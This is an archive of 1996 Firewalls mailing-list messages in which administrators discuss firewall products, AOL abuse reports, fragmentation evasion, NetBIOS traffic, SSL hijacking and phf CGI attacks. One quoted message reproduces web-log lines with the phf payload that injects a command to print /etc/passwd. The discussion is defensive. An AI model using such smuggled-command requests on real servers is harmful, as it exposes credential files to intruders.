Received: from xioa.cosmic.org (xioa.cosmic.org [206.151.181.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA02275 for ; Sat, 13 Jul 1996 08:05:45 -0700 (PDT)
Received: (from jwb@localhost) by xioa.cosmic.org (8.6.12/8.6.9) id LAA20816 for Firewalls@GreatCircle.COM; Sat, 13 Jul 1996 11:07:58 GMT
From: Joe Beiter
Message-Id: <199607131107.LAA20816@xioa.cosmic.org>
Subject: Sun Firewall software
To: Firewalls@GreatCircle.COM
Date: Sat, 13 Jul 1996 11:07:52 +0000 ()
In-Reply-To: <199607130800.BAA15923@miles.greatcircle.com> from "Firewalls-Digest" at Jul 13, 96 01:00:30 am
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Anyone know the name of that new Firewall software for Suns? Know if it is any good?

:---==@==---==@==---==@==---:
Joseph Beiter      Hacking's just another word for nothing
jwb@cosmic.org     left to kludge.

From firewalls-owner Sat Jul 13 09:32:44 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA06595 for firewalls-outgoing; Sat, 13 Jul 1996 09:19:53 -0700 (PDT)
Received: from brite.wichita.brite.com (brite.wichita.brite.com [151.214.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA06582 for ; Sat, 13 Jul 1996 09:19:41 -0700 (PDT)
Received: from usrpc10.wichita.brite.com by brite.wichita.brite.com (5.65/1.35)
Date: Sat, 13 Jul 96 11:09:26 CDT
From: Shane T Kinsch
Subject: RE: Dirty Dogs
To: "'Matthew Keenan'"
Cc: "'Firewalls'"
X-Mailer: Chameleon V0.05, TCP/IP for Windows, NetManage Inc.
Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jul 1996 08:48:20 -0400 Russ wrote: >Anyone got any ideas as to how we can make AOL more responsive to the >security issues their users create? You don't see these types of >problems originating from Compuserve. I realize that hackers could go to >other resources, but the simple fact is that AOL generates more email >bombers, faked email, and probing hackers than any other single source, >and their abuse@aol.com address is next to useless. I've sent messages >as Postmaster@, which should be treated with a modicum of respect, and >received nothing more than an auto-reply, never, ever, a single personal >response. Block aol.com. If everyone blocks AOL, then a lot of their inet users will question AOL on "full internet access".. The only drawbacks here are that some of your users depend on AOL for the user base and whatever your clients are selling/marketing etc... Shane _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ _/ Shane T Kinsch BRITE VOICE SYSTEMS, INC. 
_/ _/ shane.kinsch@brite.com UNIX SYSTEM ADMINISTRATOR _/ _/ Wichita, KS USA VP UNIX ENGINEERING _/ _/ http://www.brite.com "MIME is ok here" _/ _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ From firewalls-owner Sat Jul 13 10:47:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA09896 for firewalls-outgoing; Sat, 13 Jul 1996 10:33:37 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA09888 for ; Sat, 13 Jul 1996 10:33:30 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id MAA08413; Sat, 13 Jul 1996 12:30:19 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id LAA17076; Sat, 13 Jul 1996 11:29:04 -0500 Received: by sonic.nmti.com; id AA19394; Sat, 13 Jul 1996 11:29:03 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607131629.AA19394@sonic.nmti.com.nmti.com> Subject: Re: IP Masquerading and vulnerabilities To: cosmo@ebs.net (Craig Brozefsky) Date: Sat, 13 Jul 1996 11:29:03 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Craig Brozefsky" at Jul 12, 96 07:45:56 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > 1. Fragmenting packets so that port information is passed in second > packet and the filter only looks at first so it lets it go thru. I > know this is a possibility with various packet filtering firewalls on > the market now. Linux 2.0 has an option to re-assemble all fragmented > packets going thru it before applying the filter which stops it. Or just block packets that are too short to hold all the options. 
If you try and reassemble all the fragments that opens you up to a denial of service attack, and there really isn't any legitimate need to have packets that short. From firewalls-owner Sat Jul 13 14:32:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA17647 for firewalls-outgoing; Sat, 13 Jul 1996 14:23:15 -0700 (PDT) Received: from cronus.icorp.net (cronus.icorp.net [206.61.96.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA17639 for ; Sat, 13 Jul 1996 14:23:06 -0700 (PDT) Received: from hephaestus.icorp.net (ewieling@hephaestus.icorp.net [206.104.128.226]) by cronus.icorp.net (8.6.12/8.6.12) with SMTP id QAA06617; Sat, 13 Jul 1996 16:19:44 -0500 Message-ID: <31E812E9.794BDF32@hephaestus.icorp.net> Date: Sat, 13 Jul 1996 16:19:37 -0500 From: Eric Wieling Organization: InterCommerce Corporation X-Mailer: Mozilla 2.02 (X11; I; BSD/OS 2.0 i386) MIME-Version: 1.0 To: Helmut Springer CC: ishikawa@personal-media.co.jp, Firewalls@GreatCircle.COM Subject: Re: udp 137 broadcast from Win95 PC References: <9607031234.AA29367@info2.rus.uni-stuttgart.de> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Helmut Springer wrote: > netbios-ns 137/tcp # NETBIOS Name Service > netbios-ns 137/udp # NETBIOS Name Service Does any server respond to TCP requests on this port? Does any client make TCP requests on this port? --Eric -- Eric Wieling Advanced Network Research InterCommerce Corporation Pager: 800-758-3680 If you consistently take an antagonistic approach, however, people are going to start thinking you're from New York. 
:-) --Larry Wall to Dan Bernstein

From firewalls-owner Sat Jul 13 20:21:25 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA25750 for firewalls-outgoing; Sat, 13 Jul 1996 20:02:08 -0700 (PDT)
Received: from mark.allyn.com (mark.allyn.com [206.114.135.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id UAA25743 for ; Sat, 13 Jul 1996 20:02:01 -0700 (PDT)
Received: (from allyn@localhost) by mark.allyn.com (8.7.5/8.7) id UAA11030; Sat, 13 Jul 1996 20:03:31 -0700 (PDT)
From: Mark Allyn 206-860-9454
Message-Id: <199607140303.UAA11030@mark.allyn.com>
Subject: Re: Extending Financial Applications And Protecting via a Firewall
To: mdr@vodka.sse.att.com
Date: Sat, 13 Jul 1996 20:03:31 -0700 (PDT)
Cc: allyn@allyn.com, howzit@worldnet.att.net, Firewalls@GreatCircle.COM
In-Reply-To: <199607121640.LAA08245@ihig2.att.att.com> from "mdr@vodka.sse.att.com" at Jul 12, 96 12:46:13 pm
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello Mark:

Thanks for the note. I might have been a little naive about all of this.

First of all, in response to my suggestion about using SSL combined with password authentication, you suggested problems with session hijacking (I hope this is a good term) as well as DNS spoofing. Here is where I may have got a little fuzzy. I had assumed that when a session is under SSL encryption, the user's account name and password, as entered in the secure browser (assuming Netscape), are encrypted at the browser end and are under cover until they get at the server. If they are under cover, along with the rest of the session, then if the session is hijacked by someone else, I would think that the person who hijacked the session would have to have the correct key to decrypt the encrypted session.

Now, maybe I am wrong, but I thought that when an SSL client (Netscape Browser) initiates a session with an SSL server, there is a brief RSA public key encrypted transaction to negotiate a DES key for the session itself. Since this is under RSA public key cover, someone else could not sniff out the DES key. If the RSA encrypted session were to be hijacked, then the legitimate client would never get the DES key and the session would be aborted before the user would even get a chance to enter the password. The hijacker would not know the password and could not get into the payroll system even though he may have stolen a secure web session.

In regards to the DNS hacks, I was under the impression that with the newer browsers (Netscape 2.??) that a key pair can be pre-entered into the browser as well as the server, in which case the browser would only trust that key pair and not any of the keys that have been set up with the key registries such as Verisign. If this is the case, then the hijacker's server (the one which the hijacker diverts the client browser to) would not have a valid key pair according to the data that was pre-entered into it ahead of time. I have been envisioning that the company with the payroll system would pre-issue key pairs to their employees with instructions to enter them into their browsers and to only trust those keys and no others for their payroll transactions.

In regards to host security, I was thinking of a drop dead daemon. Something that would detect any sense of anomaly within the web server. It could look for any unauthorized processes (shells, ftp sessions; whatever). Perhaps it could even communicate with the web server daemon itself. If anything is detected, it would go into shutdown and halt the server. Of course, this would have to have some forgiveness for mistakes on the part of the users, but if the users have some sort of training, and know that their sessions were closely monitored, it could be set up fairly tight. Any URL's passed to the web server which appear to be attempts to try to run compromised CGI files (which are known, and of course removed) would signal the drop dead daemon who would log as much as possible and then shut the machine down.

All of this would require another machine (one inside the company) to constantly ping the machine to ensure that it is up, and when the drop dead daemon shuts the machine down, it would immediately make the appropriate alarms and pages to system administrators. If a system is halted like this, then no hacks could get into it and do anything. The two filters would block anything from going directly through from the outside to the inside.

Please, I hope this is clear. I never did well in English.

Mark Allyn
allyn@allyn.com

From firewalls-owner Sat Jul 13 23:32:45 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA01772 for firewalls-outgoing; Sat, 13 Jul 1996 23:21:08 -0700 (PDT)
Received: from neon.ingenia.com (neon.ingenia.com [205.207.219.29]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id XAA01765 for ; Sat, 13 Jul 1996 23:21:02 -0700 (PDT)
Received: (from shaver@localhost) by neon.ingenia.com (8.8.Alpha.2/8.6.9) id CAA20357; Sun, 14 Jul 1996 02:17:52 -0400
From: Mike Shaver
Message-Id: <199607140617.CAA20357@neon.ingenia.com>
Subject: Re: IP Masquerading and vulnerabilities
To: peter@baileynm.com (Peter da Silva)
Date: Sun, 14 Jul 1996 02:17:52 -0400 (EDT)
Cc: cosmo@ebs.net, firewalls@GreatCircle.COM
In-Reply-To: <9607131629.AA19394@sonic.nmti.com.nmti.com> from "Peter da Silva" at Jul 13, 96 11:29:03 am
X-Mailer: ELM [version 2.4 PL24 PGP3 *ALPHA*]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Thus spake Peter da Silva:
>
> > Linux 2.0 has an option to re-assemble all fragmented
> > packets going thru it before applying the filter which stops it.
>
> Or just block packets that are too short to hold all the options. If you try
> and reassemble all the fragments that opens you up to a denial of service
> attack, and there really isn't any legitimate need to have packets that
> short.

The Linux 2.0 CONFIG_ALWAYS_DEFRAG stuff is designed to make the transparent proxy and NAT code more correct; otherwise, you can get things like PORT commands (which matter to the NAT stuff, obviously) split between 2 fragments.

My recommendation is that the transparent proxy stuff is better than the NAT stuff (Darren? =) ), but it's not quite as plug-and-play.

Mike
--
#> Mike Shaver (shaver@ingenia.com)   Ingenia Communications Corporation <#
#> Chief System Architect and Herder of Bits                            <#
#>                                                                      <#
#> "Yoda say, `Just slap a little public key crypto into it' does not   <#
#> a secure system make."  -- Marcus J. Ranum (mjr@clark.net)           <#

From firewalls-owner Sat Jul 13 23:47:45 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA02317 for firewalls-outgoing; Sat, 13 Jul 1996 23:44:20 -0700 (PDT)
Received: from nethost.whanganui.ac.nz (nethost.whanganui.ac.nz [202.49.198.67]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id XAA02292 for ; Sat, 13 Jul 1996 23:44:10 -0700 (PDT)
Received: from shadowfax.whanganui.ac.nz (shadoxfax.whanganui.ac.nz [202.49.199.35]) by nethost.whanganui.ac.nz (8.6.12/8.6.6) with ESMTP id SAA28633 for ; Sun, 14 Jul 1996 18:40:51 +1200
Received: from ADMIN/FAR by shadowfax.whanganui.ac.nz (Mercury 1.21);
Received: from FAR by ADMIN (Mercury 1.11); Sun, 14 Jul 96 18:38:57 +1100
Received: from rovepc.whanganui.ac.nz by shadowfax.whanganui.ac.nz (Mercury 1.21);
Comments: Authenticated sender is
From: "Emmanuel Turner"
To: firewalls@GreatCircle.COM
Date: Sun, 14 Jul 1996 18:36:24 +1200
Subject: RE: Dirty Dogs
Reply-to: et@shadowfax.whanganui.ac.nz
X-mailer: Pegasus Mail for Windows (v2.23)
Message-ID: <2BA69D46846@shadowfax.whanganui.ac.nz>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I've just checked my httpd accesslogs and found that my Polytech's server has been subjected to the cgi-bin/phf hack too. As far as I can tell, no damage was done, though the hackers tried to :
- Kill processes on the server
- Reboot the server
- Create user accounts
- View the passwd file
- delete files

The attacks have come from various places and I've emailed the site admins, it will be interesting to see what kind of response I get. Let's just hope that the response is better than the one AOL gives :-)

---------------
Emmanuel Turner
IT Dept
Wanganui Polytech
NB : All opinions expressed, spelling and grammatical errors are mine and not my employer's.

From firewalls-owner Sun Jul 14 00:47:46 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA05393 for firewalls-outgoing; Sun, 14 Jul 1996 00:36:35 -0700 (PDT)
Received: from elaine15.Stanford.EDU (elaine15.Stanford.EDU [36.216.0.198]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id AAA05386 for ; Sun, 14 Jul 1996 00:36:29 -0700 (PDT)
Received: (from jkoum@localhost) by elaine15.Stanford.EDU (8.7.5/8.7.3) id AAA13566; Sun, 14 Jul 1996 00:33:20 -0700 (PDT)
Date: Sun, 14 Jul 1996 00:33:20 -0700 (PDT)
From: Jan Koum
To: Emmanuel Turner
cc: firewalls@GreatCircle.COM
Subject: phf hole (WAS: RE: Dirty Dogs )
In-Reply-To: <2BA69D46846@shadowfax.whanganui.ac.nz>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> I've just checked my httpd accesslogs and found that my Polytech's
> server has been subjected to the cgi-bin/phf hack too. As far as I
> can tell, no damage was done, though the hackers tried to :
> - Kill processes on the server
> - Reboot the server
> - Create user accounts

If your httpd runs as `nobody` like it should, all of the above had to fail.
> - View the passwd file
> - delete files

Viewing world readable files most likely succeeded. If some users have .rhosts world readable, they might have been read also.

> The attacks have come from various places and I've emailed the site
> admins, it will be interesting to see what kind of response I get.
> Let's just hope that the response is better than the one AOL gives :-)

Hope you will be able to prove it was wrong for them to surf the web. I had trouble doing that.

-- yan

From firewalls-owner Sun Jul 14 08:03:14 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA21048 for firewalls-outgoing; Sun, 14 Jul 1996 07:48:02 -0700 (PDT)
Received: from morebbs.com (morebbs.com [206.165.150.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA21039 for ; Sun, 14 Jul 1996 07:47:56 -0700 (PDT)
From: meowmyx@morebbs.com
Received: by morebbs.com
Message-ID: <9607141044.0F3JN00@morebbs.com>
Organization: MORE BBS
X-Mailer: TBBS/TIGER v1.0/PRIMP 1.56p
Date: Sun, 14 Jul 96 10:44:51
Subject: Ports 137 & 138
To: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The response to my post on the attempted cgi hacks was very gratifying. Thank you all who responded; I learned quite a bit from that.

Several people have posted about connects on ports 137 and 138. These connections may not be quite as innocent as they look. A guy gave Flash six screen captures of an attempted hack over these ports. Flash didn't like them because they were not pictures of naked women and gave them to me.

Connects to port 137 and 138 NetBios Names Service show IP packet to one of these ports containing UDP packet containing NetBios packet which includes the NetBios name of the target system and also contains a Microsoft Message Server Block packet \MAILSLOT\BROWSE command.

The guy who gave the screen shots to Flash says two European machines are spoofing IP addresses that belong to a manufacturer in British Columbia. The two machines are sending packets in this form across the Internet to the router that connects to the mail system of the Canadian company. The guy says the company is aware of the problem and has a security specialist looking at it.

The significance I see here is the number of applications on LAN servers that will respond to MSB commands. Maybe people with more experience will see than I do.

MeOwMyx
----- All dogs are invited to lunch in my kitty litter -----

From firewalls-owner Sun Jul 14 11:03:16 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA29082 for firewalls-outgoing; Sun, 14 Jul 1996 10:56:00 -0700 (PDT)
Received: from count04.mry.scruznet.com (count04.mry.scruznet.com [204.147.227.68]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA29067 for ; Sun, 14 Jul 1996 10:55:53 -0700 (PDT)
From: firewalls@count04.mry.scruznet.com
Received: from count04.mry.scruznet.com (localhost [127.0.0.1]) by count04.mry.scruznet.com (8.7.3/8.7.1) with ESMTP id KAA04146; Sun, 14 Jul 1996 10:56:23 -0700 (PDT)
Message-Id: <199607141756.KAA04146@count04.mry.scruznet.com>
To: meowmyx@morebbs.com
cc: firewalls@GreatCircle.COM, firewalls@count04.mry.scruznet.com
Subject: Re: Dirty dogs
In-reply-to: Your message of "Wed, 10 Jul 1996 15:28:54."
Date: Sun, 14 Jul 1996 10:56:22 -0700
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>Subject: Dirty dogs
>To: firewalls@GreatCircle.COM
>Sender: firewalls-owner@GreatCircle.COM
>Precedence: bulk
>
>
>I was browsing through the system files of a web server that sits outside a
>firewall. There were a couple of interesting entries in the access log
>
>960412access:198.69.26.81 - - [12/Apr/1996:04;24;42 -0400]
>"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207
>
>960222access:152.163.192.15 - - [21/Jun/1996:12:19:22 -0400]
>"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207
>
>This didn't work for two reasons. One, there is no phf program in the system.
>Two, the cgi application gateway is running chrooted.
>
>I am not really very good at understanding this hacking and cracking stuff.
>What else could they have tried that might have worked?
>

# whois 152.163
America Online (NET-ANS-BNET8)
   8619 Westwood Center Drive
   Vienna, VA 22182

   Netname: AOL-BNET
   Netnumber: 152.163.0.0

   Coordinator:
      Mackey, Bruce  (BM814)  Mackey@AOL.COM
      703-453-4414

   Domain System inverse mapping provided by:

   HP81.PROD.AOL.NET            192.203.190.18
   OPS01.OPS.AOL.COM            152.163.80.11
   DNS-AOL.ANS.NET              198.83.210.28

   Record last updated on 29-Nov-95.

# whois 198.69.26
InterNIC Registration (INTERNIC-BLK)                INTERNIC-BLK1      198.0.0.0 - 198.255.255.0
Sprint Government Systems Division (NETBLK-SPRINTBLK) NETBLK-SPRINTBLK 198.67.0.0 - 198.70.255.0

# whois NETBLK-SPRINTBLK
Sprint Government Systems Division (NETBLK-SPRINTBLK)
   13221 Woodland Park Road
   Herndon, VA 22071

   Netname: NETBLK-SPRINTBLK
   Netblock: 198.67.0.0 - 198.70.255.0

   Coordinator:
      Sprint Network Info. & Support Center  (SPRINT-NOC)  noc@sprintlink.net
      (800) 669-8303

   Alternate Contact:
      Albanese, Ken  (KA13)  albanese@SPRINTLINK.NET
      (703) 904-2361

   Domain System inverse mapping provided by:

   ICM1.ICP.NET                 192.94.207.66
   NS1.SPRINTLINK.NET           204.117.214.10
   NS2.SPRINTLINK.NET           199.2.252.10
   NS3.SPRINTLINK.NET           204.97.212.10

   Record last updated on 21-Jan-96.

hmm, firewall

From firewalls-owner Sun Jul 14 13:03:13 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA03466 for firewalls-outgoing; Sun, 14 Jul 1996 12:48:30 -0700 (PDT)
Received: from roble.com (roble.com [207.5.40.50]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA03459 for ; Sun, 14 Jul 1996 12:48:25 -0700 (PDT)
Received: (from marquis@localhost) by roble.com (8.7.5/8.7.3) id MAA12751; Sun, 14 Jul 1996 12:45:17 -0700 (PDT)
Date: Sun, 14 Jul 1996 12:45:17 -0700 (PDT)
From: Roger Marquis
To: Firewalls@GreatCircle.COM
Subject: RE: Dirty Dogs on AOL
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Russ wrote:
>Anyone got any ideas as to how we can make AOL more responsive to the
>security issues their users create?

If you find a way please let us know. I heard of a number of people who regularly receive abusive and harassing email from AOL accounts. Even where 1) the user IDs and real names are known, 2) AOL has been asked repeatedly, 3) the messages, including headers, are many and conclusive, and 4) after several calls and faxes by a lawyer, they neither respond nor take any action to correct the problem.

>I realize that hackers could go to
>other resources, but the simple fact is that AOL generates more email
>bombers, faked email, and probing hackers than any other single source,
>and their abuse@aol.com address is next to useless.

Without question, AOL is the only major ISP to have a total "hands off" policy in this regard.
Netcom, PSI, UUNET, BARRNET, MCI, and Sprint all seem to be reasonably responsive (in my experience). I wonder if any of this is a factor in the recently filed class action suit against AOL.

Roger Marquis

From firewalls-owner Sun Jul 14 15:33:14 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA10512 for firewalls-outgoing; Sun, 14 Jul 1996 15:16:48 -0700 (PDT)
Received: from maryann.ebs.net (maryann.ebs.net [204.254.158.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id PAA10502 for ; Sun, 14 Jul 1996 15:16:40 -0700 (PDT)
Received: (from uucp@localhost) by maryann.ebs.net (8.7.5/8.6.9) id RAA25527; Sun, 14 Jul 1996 17:18:49 -0500
Received: from gilligan.ebs.net(204.254.158.13) by maryann.ebs.net via smap (V1.3)
Date: Sun, 14 Jul 1996 17:13:10 -0500 (CDT)
From: Craig Brozefsky
To: Peter da Silva
cc: firewalls@GreatCircle.COM
Subject: Re: IP Masquerading and vulnerabilities
In-Reply-To: <9607131629.AA19394@sonic.nmti.com.nmti.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Sat, 13 Jul 1996, Peter da Silva wrote:

> > 1. Fragmenting packets so that port information is passed in second
> > packet and the filter only looks at first so it lets it go thru. I
> > know this is a possibility with various packet filtering firewalls on
> > the market now. Linux 2.0 has an option to re-assemble all fragmented
> > packets going thru it before applying the filter which stops it.
>
> Or just block packets that are too short to hold all the options. If you try
> and reassemble all the fragments that opens you up to a denial of service
> attack, and there really isn't any legitimate need to have packets that
> short.
>

I'll have to look at the Linux 2.0.* source to see if it does this, or does someone know already, and if not have a patch? I think the method that Peter suggested is the most efficient and would also take care of some other funniness.

Craig Brozefsky          cosmo@ebs.net
System Administrator     vox: 312-226-1675
EBS.NET                  http://www.ebs.net
*****available for limited time only in this dimension****

From firewalls-owner Sun Jul 14 15:48:09 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA10629 for firewalls-outgoing; Sun, 14 Jul 1996 15:21:24 -0700 (PDT)
Received: from maryann.ebs.net (maryann.ebs.net [204.254.158.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id PAA10615 for ; Sun, 14 Jul 1996 15:21:14 -0700 (PDT)
Received: (from uucp@localhost) by maryann.ebs.net (8.7.5/8.6.9) id RAA25565; Sun, 14 Jul 1996 17:23:25 -0500
Received: from gilligan.ebs.net(204.254.158.13) by maryann.ebs.net via smap (V1.3)
Date: Sun, 14 Jul 1996 17:17:42 -0500 (CDT)
From: Craig Brozefsky
To: Mike Shaver
cc: Peter da Silva , firewalls@GreatCircle.COM
Subject: Re: IP Masquerading and vulnerabilities
In-Reply-To: <199607140617.CAA20357@neon.ingenia.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Sun, 14 Jul 1996, Mike Shaver wrote:

> > Or just block packets that are too short to hold all the options. If you try
> > and reassemble all the fragments that opens you up to a denial of service
> > attack, and there really isn't any legitimate need to have packets that
> > short.
>
> The Linux 2.0 CONFIG_ALWAYS_DEFRAG stuff is designed to make the
> transparent proxy and NAT code more correct; otherwise, you can get
> things like PORT commands (which matter to the NAT stuff, obviously)
> split between 2 fragments.
>
> My recommendation is that the transparent proxy stuff is better than
> the NAT stuff (Darren? =) ), but it's not quite as plug-and-play.

I have no problem setting up some proxies from the FWTK, particularly since the application I'm looking at would be predominantly Windows users who would not be using any other services except the ones which the FWTK already has proxies for. Damn, now if only I could get rid of the need for NFS on my current network and I'd have that bastid pretty tightly secured.

Craig Brozefsky          cosmo@ebs.net
System Administrator     vox: 312-226-1675
EBS.NET                  http://www.ebs.net
*****available for limited time only in this dimension****

From firewalls-owner Sun Jul 14 18:18:15 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA18698 for firewalls-outgoing; Sun, 14 Jul 1996 18:05:28 -0700 (PDT)
Received: from interlock.ans.net (interlock.ans.net [147.225.5.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id SAA18691 for ; Sun, 14 Jul 1996 18:05:19 -0700 (PDT)
Received: by interlock.ans.net id AA24479
Message-Id: <199607150101.AA24479@interlock.ans.net>
Received: by interlock.ans.net (Protected-side Proxy Mail Agent-2);
Received: by interlock.ans.net (Protected-side Proxy Mail Agent-1);
From: Dan Simoes
Subject: Re: Dirty Dogs on AOL
To: marquis@roble.com (Roger Marquis)
Date: Sun, 14 Jul 1996 21:01:58 -0400 (EDT)
Cc: Firewalls@GreatCircle.COM
In-Reply-To: from "Roger Marquis" at Jul 14, 96 12:45:17 pm
X-Mailer: ELM [version 2.4 PL25 PGP6]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I don't want to make this into an "I love/hate AOL" thread, which does not belong on this list, but I wanted to address two points from previous emails.

> >I realize that hackers could go to
> >other resources, but the simple fact is that AOL generates more email
> >bombers, faked email, and probing hackers than any other single source,
> >and their abuse@aol.com address is next to useless.

AOL is the single largest point of entry to the net (6M+ members) so it is to be expected that there is a proportionally large number of problems caused by AOL users. I've found that mailing to postmaster@aol.com gets good results in tracking abuses. I was quite impressed upon my first visit to AOL to discover that they have a small department dedicated to mail/news/security abuses. Whatever problems AOL brought to the net years ago, they are committed to avoiding and being good netizens.

> Without question, AOL is the only major ISP to have a total "hands
> off" policy in this regard. Netcom, PSI, UUNET, BARRNET, MCI, and
> Sprint all seem to be reasonably responsive (in my experience). I
> wonder if any of this is a factor in the recently filed class action
> suit against AOL.

AOL is not exactly what I'd call an ISP, but I have found AOL to be quite responsive in addressing problems caused by their users. The class action suit you mention is about billing issues, not security.

Yes, ANS is owned by AOL, but I am speaking as a fellow sysadmin/listowner/security-type, not as an employee.
| Dan | -- Dan Simoes dans@ans.net ANS http://coimbra.ans.net/dans.html 100 Clearbrook Road (914) 789-5378 (voice) Elmsford, NY 10523 (914) 789-5310 (fax) From firewalls-owner Mon Jul 15 04:48:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA12915 for firewalls-outgoing; Mon, 15 Jul 1996 04:43:58 -0700 (PDT) Received: from macroint.com (ns [199.34.38.229]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA12898 for ; Mon, 15 Jul 1996 04:43:53 -0700 (PDT) Received: from ccmail.macroint.com ([172.16.4.2]) by gateway.macroint.com with SMTP id <61448>; Mon, 15 Jul 1996 07:32:05 -0400 Received: from ccMail by ccmail.macroint.com (SMTPLINK V2.11.01) Date: Mon, 15 Jul 1996 08:36:46 -0400 From: "WILDBERGER" Message-Id: <9606158374.AA837441588@ccmail.macroint.com> To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V5 #417 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Majordomo@GreatCircle.COM From firewalls-owner Mon Jul 15 05:03:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA12722 for firewalls-outgoing; Mon, 15 Jul 1996 04:41:03 -0700 (PDT) Received: from smtpgate.saa-cons.co.uk (haddock.demon.co.uk [158.152.16.191]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id EAA12715 for ; Mon, 15 Jul 1996 04:40:51 -0700 (PDT) Received: by smtpgate.saa-cons.co.uk (8.6.8.1/1.3-eef) Received: from haddock.saa-cons.co.uk(193.132.156.161) by amnesiac via smap (V1.3) Received: by haddock.saa-cons.co.uk (AIX 3.2/UCB 5.64/5.00) Date: Mon, 15 Jul 1996 12:25:11 +0100 (BST) From: Dave Roberts To: Firewalls@GreatCircle.COM Subject: Re: Dirty Dogs on AOL In-Reply-To: <199607150101.AA24479@interlock.ans.net> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sun, 14 Jul 1996, Dan Simoes wrote: > of problems caused by AOL users. 
